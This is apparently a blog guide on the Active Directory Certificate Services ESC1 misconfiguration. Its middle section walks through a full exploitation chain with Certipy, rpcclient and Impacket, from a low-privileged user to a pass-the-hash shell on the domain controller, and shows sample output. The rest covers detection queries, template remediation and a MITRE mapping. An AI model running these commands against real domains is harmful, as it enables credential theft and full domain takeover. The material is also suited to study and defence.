From Machine Account To Domain Admin Exploiting Adcs And Esc1 For

Gombloh

-Apr 7, 2026, 7:34 PM

from machine account to domain admin exploiting adcs and esc1 for

Executive Summary Active Directory Certificate Services (ADCS) ESC1 is a critical misconfiguration that allows attackers with low-privileged domain credentials to escalate to Domain Administrator. This vulnerability exists when certificate templates are improperly configured, allowing users to request certificates on behalf of any domain account, including administrators. In this guide, we'll cover what ESC1 is, how attackers exploit it, the tools used, and how to defend your environment. What is ADCS-ESC1?

Understanding Active Directory Certificate Services Active Directory Certificate Services (ADCS) is Microsoft's Public Key Infrastructure (PKI) solution that manages digital certificates in Windows environments.

ADCS enables: - User and computer authentication - Smart card logon - Code signing - Secure email (S/MIME) - Network access control (802.1x) The ESC1 Vulnerability ESC1 occurs when a certificate template has all of the following misconfigurations: - Enrollee Supplies Subject is enabled - Users can specify the Subject Alternative Name (SAN) - Client Authentication EKU is present - Certificate can be used for authentication - No Manager Approval required - Certificates are issued automatically - Domain Users can enroll - Low-privileged users have enrollment rights - Template is enabled - The template is published and active When these conditions exist together, an attacker can: - Request a certificate for ANY user (including Domain Admin) - Use that certificate to authenticate as that user - Maintain access for the certificate's validity period (typically 1-10 years) Why This Matters Severity: Critical - Full domain compromise from low-privileged account Impact: - Immediate Domain Administrator access - Long-term persistence (certificates valid for years) - Survives password resets - Difficult to detect in standard logs - Can be renewed before expiration How Attackers Exploit ESC1 Attack Prerequisites - Valid domain credentials (any domain user) - Network access to Domain Controller - Network access to Certificate Authority Attack Flow Low-Priv User -> Enumerate ADCS -> Find ESC1 Template -> Request Admin Certificate -> Authenticate -> Domain Admin Tools Used in ESC1 Attacks Offensive Tools Certipy-AD - Python-based ADCS exploitation tool - Enumerates certificate templates - Identifies vulnerabilities (ESC1-ESC13) - Requests and authenticates with certificates - Repository: https://github.com/ly4k/Certipy RPCClient - Part of Samba suite - Queries Active Directory via RPC - Used to enumerate user SIDs Impacket - Python library for network protocols - Tools for Pass-the-Hash attacks - Remote command execution (wmiexec, psexec, smbexec) - Repository: https://github.com/fortra/impacket NetExec - Network reconnaissance tool - Domain enumeration - Credential validation Step-by-Step Exploitation Prerequisites for ESC1 Exploitation: Before this attack can succeed, the following conditions must be met: Account Requirements: - Domain user account - Any authenticated domain user (even low-privileged) - No special permissions required - Standard domain user privileges are sufficient - Enrollment rights - User must have enrollment permissions on the vulnerable certificate template (typically granted to "Domain Users" group by default) Certificate Template Requirements: - Client Authentication EKU enabled - Template allows certificates to be used for authentication - "Supply in the request" enabled - Also known as "Enrollee Supplies Subject," this allows the user to specify the Subject Alternative Name (SAN) - No manager approval required - Certificate issuance is automatic without administrative approval - Domain Users can enroll - Template permissions allow standard domain users to request certificates - Template is published - Certificate template must be enabled and available on the Certificate Authority Infrastructure Requirements: - Active Directory Certificate Services (ADCS) deployed - Organization must be using ADCS for PKI - Certificate-based authentication enabled - Domain must accept certificates for Kerberos authentication - Network access to Certificate Authority - Attacker must be able to reach the CA server (typically port 135 for RPC) Tools Required: - Certipy-AD - For certificate enumeration and exploitation - Impacket suite - For credential extraction and lateral movement - Network connectivity - To domain controller and certificate authority Why This Works: ESC1 exists because the "Enrollee Supplies Subject" setting combined with Client Authentication creates a dangerous combination: any domain user can request a certificate claiming to be any other user (including Domain Admins), and that certificate will be trusted for authentication without verification.

Environment Details Throughout this demonstration, the following environment details are used: Domain: EXAMPLE.COM Domain Controller: 192.168.1.10 Certificate Authority: EXAMPLE-DC-CA CA Server: DC01.EXAMPLE.COM Compromised User: testuser Password: SecurePass123 Target Account: administrator@EXAMPLE.COM Step 1: Enumerate ADCS and Find Vulnerable Templates Command: certipy-ad find -u "testuser@EXAMPLE.COM" -p "SecurePass123" -dc-ip 192.168.1.10 -vulnerable -enabled Sample Output: Certipy v4.8.2 - by Oliver Lyak (ly4k) [*] Finding certificate templates [*] Found 45 certificate templates [*] Finding certificate authorities [*] Found 1 certificate authority [*] Found 12 enabled certificate templates Certificate Authorities 0 CA Name : EXAMPLE-DC-CA DNS Name : DC01.EXAMPLE.COM Certificate Subject : CN=EXAMPLE-DC-CA, DC=EXAMPLE, DC=COM Certificate Serial Number : 1A2B3C4D5E6F7890 Certificate Validity Start : 2023-01-15 08:30:00+00:00 Certificate Validity End : 2028-01-15 08:40:00+00:00 Certificate Templates 0 Template Name : VulnerableUserTemplate Display Name : Vulnerable User Template Certificate Authorities : EXAMPLE-DC-CA Enabled : True Client Authentication : True Enrollment Agent : False Any Purpose : False Enrollee Supplies Subject : True Certificate Name Flag : EnrolleeSuppliesSubject Enrollment Flag : None Private Key Flag : ExportableKey Extended Key Usage : Client Authentication Smart Card Logon Requires Manager Approval : False Requires Key Archival : False Authorized Signatures Required : 0 Validity Period : 5 years Renewal Period : 6 weeks Minimum RSA Key Length : 2048 Permissions Enrollment Permissions Enrollment Rights : EXAMPLE.COM\Domain Users EXAMPLE.COM\Authenticated Users Object Control Permissions Owner : EXAMPLE.COM\Enterprise Admins Write Owner Principals : EXAMPLE.COM\Domain Admins EXAMPLE.COM\Enterprise Admins Write Dacl Principals : EXAMPLE.COM\Domain Admins EXAMPLE.COM\Enterprise Admins Write Property Principals : EXAMPLE.COM\Domain Admins EXAMPLE.COM\Enterprise Admins [!] Vulnerabilities ESC1 : 'EXAMPLE.COM\\Domain Users' can enroll, enrollee supplies subject and template allows client authentication What to Look For: [!] Vulnerabilities section shows ESC1 Enrollee Supplies Subject: True Client Authentication: True Requires Manager Approval: False Domain Users have enrollment rights Step 2: Obtain Administrator SID Microsoft patch KB5014754 requires the target user's SID in certificate requests.

We need to retrieve this. Command: rpcclient -U "EXAMPLE\\testuser%SecurePass123" 192.168.1.10 Sample Output: rpcclient $> Query Administrator SID: lookupnames administrator Sample Output: administrator S-1-5-21-3623811015-3361044348-30300820-500 (User: 1) Note the SID: S-1-5-21-3623811015-3361044348-30300820-500 Type exit to close rpcclient. Step 3: Request Certificate for Administrator Now we request a certificate claiming to be the administrator.

Command: certipy-ad req -u 'testuser@EXAMPLE.COM' -p 'SecurePass123' -dc-ip 192.168.1.10 -ca 'EXAMPLE-DC-CA' -target 'DC01.EXAMPLE.COM' -template 'VulnerableUserTemplate' -upn 'administrator@EXAMPLE.COM' -sid 'S-1-5-21-3623811015-3361044348-30300820-500' Sample Output: Certipy v4.8.2 - by Oliver Lyak (ly4k) [*] Requesting certificate via RPC [*] Successfully requested certificate [*] Request ID is 2847 [*] Got certificate with UPN 'administrator@EXAMPLE.COM' [*] Certificate object SID is 'S-1-5-21-3623811015-3361044348-30300820-500' [*] Saved certificate and private key to 'administrator.pfx' Success Indicators: - Successfully requested certificate - Certificate saved to administrator.pfx - Request ID provided (note for cleanup) Step 4: Authenticate with Certificate Use the certificate to obtain administrator credentials.

Command: certipy-ad auth -pfx administrator.pfx -dc-ip 192.168.1.10 Sample Output: Certipy v4.8.2 - by Oliver Lyak (ly4k) [*] Using principal: administrator@EXAMPLE.COM [*] Trying to get TGT... [*] Got TGT [*] Saved credential cache to 'administrator.ccache' [*] Trying to retrieve NT hash for 'administrator' [*] Got hash for 'administrator@EXAMPLE.COM': aad3b435b51404eeaad3b435b51404ee:a1b2c3d4e5f6g7h8i9j0k1l2m3n4o5p6 Credentials Obtained: NT Hash: a1b2c3d4e5f6g7h8i9j0k1l2m3n4o5p6 Kerberos TGT: administrator.ccache Step 5: Access Domain Controller Use Pass-the-Hash to execute commands as Domain Administrator.

Command: impacket-wmiexec EXAMPLE.COM/administrator@192.168.1.10 -hashes 'aad3b435b51404eeaad3b435b51404ee:a1b2c3d4e5f6g7h8i9j0k1l2m3n4o5p6' Sample Output: Impacket v0.11.0 - Copyright 2023 Fortra [*] SMBv3.0 dialect used [!] Launching semi-interactive shell - Careful what you execute [!] Press help for extra shell commands C:\>whoami example\administrator C:\>hostname DC01 C:\>net user User accounts for \\DC01 Administrator Guest krbtgt testuser svcadmin sqlservice The command completed successfully. C:\> Domain Admin access achieved!

Detection Strategies Event Log Monitoring Key Event IDs to Monitor: Event ID 4886 - Certificate Request - Location: Certificate Authority -> Security Log - Shows: Who requested a certificate - Limitation: Doesn't show the SAN value used Event ID 4887 - Certificate Issued - Location: Certificate Authority -> Security Log - Shows: Which template was used and who received it Event ID 4768 - Kerberos TGT Request - Location: Domain Controller -> Security Log - Shows: Authentication type - ESC1 Indicator: PreAuthType = 16 (PKINIT/Certificate authentication) Certificate Authority Console - Open certsrv.msc on CA server - Navigate to "Issued Certificates" - Add columns: "Requester Name" and "Subject Alternative Name" - Red Flag: Requester Name ≠ SAN (e.g., testuser requests certificate for administrator) SIEM Detection Query Example Splunk Query: index=windows EventCode=4887 OR EventCode=4768 | where (EventCode=4887 AND RequesterName!="administrator") OR (EventCode=4768 AND PreAuthType=16) | stats count by RequesterName, TargetUserName, ComputerName Mitigation and Remediation Fix Vulnerable Templates Access Certificate Templates: Run -> certtmpl.msc For Each Vulnerable Template: - Right-click template -> Properties - Subject Name Tab: - Change from "Supply in the request" - To "Build from this Active Directory information" - Issuance Requirements Tab: - Enable "CA certificate manager approval" - Security Tab: - Remove "Domain Users" from enrollment rights - Remove "Authenticated Users" from enrollment rights - Add only specific security groups that require access Revoke Malicious Certificates - Open certsrv.msc on the Certificate Authority - Navigate to "Issued Certificates" - Find certificate by Request ID - Right-click -> "All Tasks" -> "Revoke Certificate" - Select Reason: "Privilege Withdrawal" Best Practices Template Configuration: - Never allow "Supply in the request" unless absolutely necessary - Always require manager approval for sensitive templates - Restrict enrollment to specific groups, not Domain Users - Remove Client Authentication EKU if not required - Reduce certificate validity periods (use shorter timeframes) Monitoring: - Enable audit logging on Certificate Authority (Event IDs 4886, 4887) - Monitor for certificate requests with mismatched requester/SAN - Alert on PKINIT authentication (Event ID 4768, PreAuthType=16) - Regularly audit certificate templates for misconfigurations Regular Audits: Run vulnerability scans using Certipy or similar tools: certipy-ad find -u 'auditor@domain.com' -p 'password' -dc-ip <DC-IP> -vulnerable -enabled Real-World Impact Threat Actor Usage APT29 (2022): Used ESC1 to impersonate administrators and maintain persistent access in compromised networks.

UNC5330 (2024): Exploited Ivanti vulnerabilities followed by ESC1 abuse for domain escalation. Business Impact - Average Breach Cost: $4.35M (2024) - Recovery Time: 6-12 months for full domain rebuild - Certificate Validity: 1-10 years of potential unauthorized access - Persistence: Survives password resets and standard remediation MITRE ATT&CK Framework Mapping for ESC1 Primary Technique T1649 - Steal or Forge Authentication Certificates - Tactic: Credential Access - URL: https://attack.mitre.org/techniques/T1649/ - Description: Adversaries may steal or forge certificates used for authentication to access remote systems or resources.

Certificate-related misconfigurations enable opportunities for privilege escalation by allowing users to impersonate privileged accounts via identities (SANs) associated with a certificate.

Tactics Covered TA0006 - Credential Access - ESC1 enables obtaining administrator authentication certificates TA0004 - Privilege Escalation - Escalating from low-privileged user to Domain Administrator via certificate impersonation TA0003 - Persistence - Long-term access via certificate validity (typically 1-10 years), surviving password resets Related Sub-Techniques T1078.002 - Valid Accounts: Domain Accounts - Tactics: Defense Evasion, Persistence, Privilege Escalation, Initial Access - URL: https://attack.mitre.org/techniques/T1078/002/ - Once certificate is obtained, it functions as valid domain account credentials for authentication Detection Data Sources (per MITRE) - Active Directory: Active Directory Credential Request - Active Directory: Active Directory Object Modification - Application Log: Application Log Content - Logon Session: Logon Session Creation - Windows Registry: Windows Registry Key Access Key MITRE References - SpecterOps Certified Pre-Owned Whitepaper - Referenced in T1649 as foundational research - Contributors: Lee Christensen (SpecterOps), Thirumalai Natarajan (Mandiant) - Technique Created: August 3, 2022 - Last Modified: October 14, 2024 Conclusion ADCS-ESC1 represents a critical vulnerability that transforms low-privileged access into long-term domain compromise.

The combination of easy exploitation, difficult detection, and extended persistence makes this a high-priority security concern for any organization running Active Directory Certificate Services.

Key Takeaways: - ESC1 is exploitable with basic domain credentials and publicly available tools - Detection is challenging without proper logging and monitoring - Impact is severe - full domain compromise with multi-year persistence - Remediation is straightforward - fix template configurations and implement proper access controls - Prevention is critical - regular audits and security best practices Organizations must prioritize ADCS security by: - Auditing certificate templates regularly - Implementing least-privilege access controls - Enabling comprehensive monitoring - Training administrators on ADCS security - Testing defenses through purple team exercises The tools and knowledge to exploit ADCS are freely available.

The question is not whether attackers will target your certificate infrastructure, but when. Proactive security measures are essential to protect against this "privilege escalation as a service" vulnerability. References - SpecterOps - Certified Pre-Owned: https://specterops.io/wp-content/uploads/sites/3/2022/06/Certified_Pre-Owned.pdf - Black Hills Information Security - ADCS Abuse Guide: https://www.blackhillsinfosec.com/abusing-active-directory-certificate-services-part-one/ - Microsoft ADCS Documentation: https://learn.microsoft.com/en-us/windows-server/identity/ad-cs/ - Certipy GitHub Repository: https://github.com/ly4k/Certipy - Impacket GitHub Repository: https://github.com/fortra/impacket

From Machine Account To Domain Admin Exploiting Adcs And Esc1 For

People Also Asked

ESC1 & ESC8: Pentesting Active Directory Certificate Services?

ADCS-ESC1: Misconfigured Certificate Templates Leading to ...?

Exploiting AD CS: A quick look at ESC1 and ESC8 - Crowe LLP?

ESC1 Attack: Detecting & Mitigating Vulnerabilities | BeyondTrust?

ADCS Misconfiguration: How to Find and Fix It (ESC1, ESC8 Guide)?